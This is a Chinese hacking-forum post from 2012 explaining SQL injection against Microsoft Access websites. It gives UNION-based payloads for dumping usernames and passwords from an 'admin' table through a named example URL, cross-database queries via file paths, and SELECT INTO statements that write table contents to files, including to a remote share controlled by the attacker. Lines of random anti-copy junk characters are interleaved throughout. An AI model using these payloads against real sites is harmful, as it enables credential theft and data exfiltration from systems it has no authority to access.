中国网络渗透测试联盟
标题:
Access高级注入语句
[打印本页]
作者:
admin
时间:
2012-9-15 14:20
标题:
Access高级注入语句
--------------------------------------------------------------
1 H7 I& R* @( a6 Z' U
union查询法
- M$ U3 C8 c2 _1 E
首先要说的就是查询办法,一般的查询办法就是
" v& V3 E5 F9 H$ u2 I( K
# v3 D# R \5 }) ^
程序代码
* E* W3 }$ G8 Y# _0 ]0 P( A4 Z: I
and 1=(select count(*) from admin where left(id,1)='1')
* ]. W! G" W" o0 ^
; _) ^0 U( r* O, y
这样开始判断了...就算你使用各种各样的工具,也是一个个字的去猜去判断对不对,不对再换一个.这样的坏处显而易见,慢. 特别是在猜测经过32位MD5加密过的段的时候...基本上你可以去泡壶茶再喝一杯.
* @. H) B5 F3 F' H. B% u1 O
所以这个时候,union select横空出现.别以为只能在PHP里用哦...
* }: C# d5 x4 d# b! ^9 p
譬如你有一个ACCESS点:
4 S$ N! u9 O4 W1 d! @5 d
程序代码
) ^% s5 |1 L- a
http://bbs.tian6.com/xiaoyang.asp?coder=1
7 L0 t+ L- e; o9 J% D
$ ?* j$ w' h a! H7 K1 ?9 C) X
知道存在admin表(你当然可以拿个工具先快速猜出表和字段来),
7 I4 B( A$ s" c2 {4 v5 V
然后我们直接来:
0 x9 v3 ?' t# N4 s9 e" @9 t# E
程序代码
; ?4 E2 o5 P3 a9 b. E
http://bbs.tian6.com/xiaoyang.asp?coder=1
union select 1,2,3,4,5,6..... from admin [where coderx=1(如果有限制查询条件)]
2 X8 u7 W. m& r0 f+ t3 i
4 A, L9 D6 D/ m" l" L, D# |( ^
这里从1开始加到回显正常为止.然后替换URL里相应在页面出现的1~X为password,username之类的东西,就可以直接暴内容了.多方便,多快捷.茶可以先放放,凉一些再来喝了.
; v1 c1 k! N- p6 C
. ]. M( i- Y" Y! ]3 _! s( k) c, q
/ m" r8 ~- k( D3 u/ [% ~- L
; S1 w& V* G. }' _- K
---------------------------------------------------------------
/ v, ~9 t% V. \# J+ \' E9 O3 A, U
Access跨库查询
9 O9 X* J. O4 r; k9 i7 |* }* Y" v
有时候某个网站服务器上有两个以上系统,你发现其中一个有ACCESS注入点,但是后台没法提权,另外一个系统没有注入点,但是后台却有你需要的功能.那么这个时候,跨库来了.当然,你还可以用来MDB溢出,渗透的过程等等.他的作用往往是意想不到的.
$ T" g, Q3 L7 h; l
跨库的查询语句:
& B |- ]) w7 {2 M1 d& Q9 M
子查询:
' \! A0 P! x" y2 h: ?
程序代码
' a1 O7 C9 {8 {2 b' W3 K& h0 u
and (Select Count(*) from [D:\tianyang\backdoor\xiaoyang.mdb].test)>0
2 ^* h3 S/ t @3 D* g
/ M1 h* Z) m d7 u- P* |
union查询:
! w& @- w5 Q7 h# A
程序代码
# p- }6 A/ I: [$ h
union select 1,2,3,4.... from admin in "D:\xioatianyang\okok.asa" where id=1
/ r8 _, {& C; Z, y; q) i" E4 Q) x( V
1 ]# o* z7 u- {- ~
跨库的作用当然不只这些了,大伙继续发挥吧..这里提供两篇参考过的文章连接:
* D: n9 F: ^1 p5 @
程序代码
& {$ A3 B' r5 P5 d f
http://www.4ngel.net/article/46.htm
+ l; \8 I# S" _: k' K& _; A
http://hf110.com/Article/hack/rqsl/200502/66.html
8 Y6 b9 x( `. d
. n2 w/ d4 }& }9 @8 A
---------------------------------------------------------------
, f& d( M+ c( W" F4 p9 y# w* d
Access注入,导出txt,htm,html
. q/ x9 ^6 G, N
子查询语句:
; s1 R( z# [! w( _ S; W
程序代码
/ G# @/ q: y0 h) L
Select * into [test.txt] in 'd:\web\' 'text;' from admin
9 h6 u1 H! u. r# y
& }& y" d* Q6 n5 R/ V/ {; p2 N
这样就把admin表的内容以test类型存进了d:\web里面.
2 M9 R" f) h; V5 E# _" T1 z
UNION查询:
) `' {' u, X) z+ q% F
程序代码
$ K6 V- U7 W5 {. j/ j1 u
union select * into [admin.txt] in 'c:\' 'test;' from admin
2 w4 f5 S1 p# A, S+ a
* H, N' L; u2 q: Y& s& y
而且这里也可以保存到本地来:
' e5 f" _" c- p2 ]
程序代码
7 [' u1 F% j" F2 }/ x& Y, A
Select * into [test.txt] in '\\yourip\share' 'text;' from admin
1 u* a; K! d; L8 S
" x$ A6 l9 t. q ?& c) E9 M
不过,很多人包括我自己测试,本机数据库来操作是没问题的,但是一旦在注入点上,子查询会回显没有权限,union会回显动作查询不能作为行的来源.可以说还是个难题...原因大概是UNION只适用查询结合,UNION后面不能跟动作.和这个内容相关的,本论坛已有一帖:
7 H6 C, c( ~( G9 u( Z u8 ], q1 U% D
* \+ w2 a% J; J# t& E# X$ A' m* g
程序代码
4 t0 ^9 c }! O6 I& D1 d* y9 b
http://bbs.tian6.com/viewthread.php?tid=3016&extra=page%3D7
v! Q0 H) o/ L* K4 X
' [- I, ?: m- g+ }3 Q
因为网上有许多和这相关的资料,所以我还是把他引进来了.如果一旦这方法运用成功的话,理论上我们只要知道表名,不需要知道段名,就可以看到该表所有内容了.或者我们可以建.php.tianyang asp.asp之类的文件或者目录来导进文件~还是会很强大的.
6 C. B- Y | F H/ Z$ K
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2